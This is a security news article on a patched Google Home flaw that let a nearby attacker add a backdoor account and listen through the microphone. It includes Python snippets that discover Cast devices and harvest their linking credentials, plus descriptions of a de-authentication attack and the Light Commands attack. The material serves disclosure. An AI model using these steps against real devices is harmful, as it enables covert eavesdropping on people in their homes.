A security researcher was awarded a $107,500 bug bounty for identifying security flaws in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices.
The flaws “allowed an attacker within wireless proximity to install a ‘backdoor’ account on the device, enabling them to send commands to it remotely over the internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN,” the researcher, who goes by the name Matt, disclosed in a technical write-up published this week.
Such malicious requests could allow the attacker to learn the Wi-Fi password and directly access other devices connected to the same network. Following responsible disclosure on January 8, 2021, Google fixed the issues in April 2021. In short, the problem is that the Google Home software architecture can be abused to add a rogue Google user account to a target’s home automation device.
In a series of attacks described by the researcher, a threat actor looking to eavesdrop on a victim can trick them into installing a malicious Android app which, upon detecting a Google Home device on the network, issues covert HTTP requests to link the attacker’s account to the victim’s device. Taking things a step further, it emerged that a Google Home device could be forced into “setup mode” and made to create its own open Wi-Fi network by staging a Wi-Fi de-authentication attack that knocks it off the network.
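The first step of the flow above is local discovery. Google Home speakers advertise themselves over mDNS using the standard Cast service name; a minimal sketch of the query a malicious app could send is below. The service name `_googlecast._tcp.local.` follows the public Cast discovery convention, but the surrounding details are illustrative assumptions, not the researcher’s actual tooling.

```python
# Illustrative sketch: discovering Cast-capable devices (such as Google Home)
# on the local network via an mDNS PTR query. Assumptions: the standard
# multicast group 224.0.0.251:5353 and the _googlecast._tcp.local. service.
import socket
import struct

MDNS_GROUP = ("224.0.0.251", 5353)
SERVICE = "_googlecast._tcp.local."

def build_mdns_query(service: str) -> bytes:
    """Build a one-question mDNS PTR query for the given service name."""
    # DNS header: ID=0, flags=0, QDCOUNT=1, AN/NS/AR counts = 0
    header = struct.pack(">6H", 0, 0, 1, 0, 0, 0)
    # Encode the service name as length-prefixed labels, null-terminated
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in service.rstrip(".").split(".")
    ) + b"\x00"
    # QTYPE=12 (PTR), QCLASS=1 (IN)
    question = qname + struct.pack(">2H", 12, 1)
    return header + question

if __name__ == "__main__":
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)
    sock.sendto(build_mdns_query(SERVICE), MDNS_GROUP)
    try:
        _, addr = sock.recvfrom(4096)
        print("Cast device responded from", addr[0])
    except socket.timeout:
        print("No Cast devices answered")
```

Any device answering this query reveals its IP address, which is all the rogue app needs to begin talking to the speaker’s local HTTP API.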
The threat actor can then connect to the device’s setup network and request details such as the device name, cloud device ID, and certificate, using them to link their own account to the device. Regardless of the attack sequence employed, a successful linking process enables the attacker to abuse Google Home features to lower the device’s volume to zero and call a predetermined phone number whenever they want to listen in on the victim through the microphone.
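Once on the setup network, the linking prerequisites can be fetched from the speaker’s local HTTP API. The sketch below assumes the publicly documented Cast local endpoint (`/setup/eureka_info` on port 8008) and a hypothetical device address; treat both as assumptions rather than the researcher’s exact method.

```python
# Hypothetical sketch: requesting the fields the write-up says are needed to
# link an account (device name, cloud device ID, certificate) from the
# speaker's local API while connected to its open setup network.
import json
from urllib.request import urlopen

# Assumed address of the speaker on its own setup network (illustrative)
SETUP_HOST = "192.168.255.249"

def extract_link_fields(info: dict) -> dict:
    """Keep only the fields needed for the account-linking step."""
    return {k: info.get(k) for k in ("name", "cloud_device_id", "certificate")}

if __name__ == "__main__":
    url = (f"http://{SETUP_HOST}:8008/setup/eureka_info"
           "?params=name,cloud_device_id,certificate")
    with urlopen(url, timeout=5) as resp:
        info = json.load(resp)
    print(extract_link_fields(info))
```

Because the setup network is open and the endpoint is unauthenticated, nothing stops a nearby attacker from harvesting these values and replaying them in the normal account-linking flow.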
“The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something,” Matt said. “During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.”
The attack can also be extended to read files, make arbitrary HTTP requests within the victim’s network, and push malicious modifications to the linked device that take effect after a reboot. This is not the first time attack techniques have been devised to covertly listen in on potential targets through voice-activated devices.
A team of academics unveiled a technique in November 2019 called “Light Commands,” which exploits a flaw in MEMS microphones to remotely inject inaudible and invisible commands into well-known voice assistants like Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light.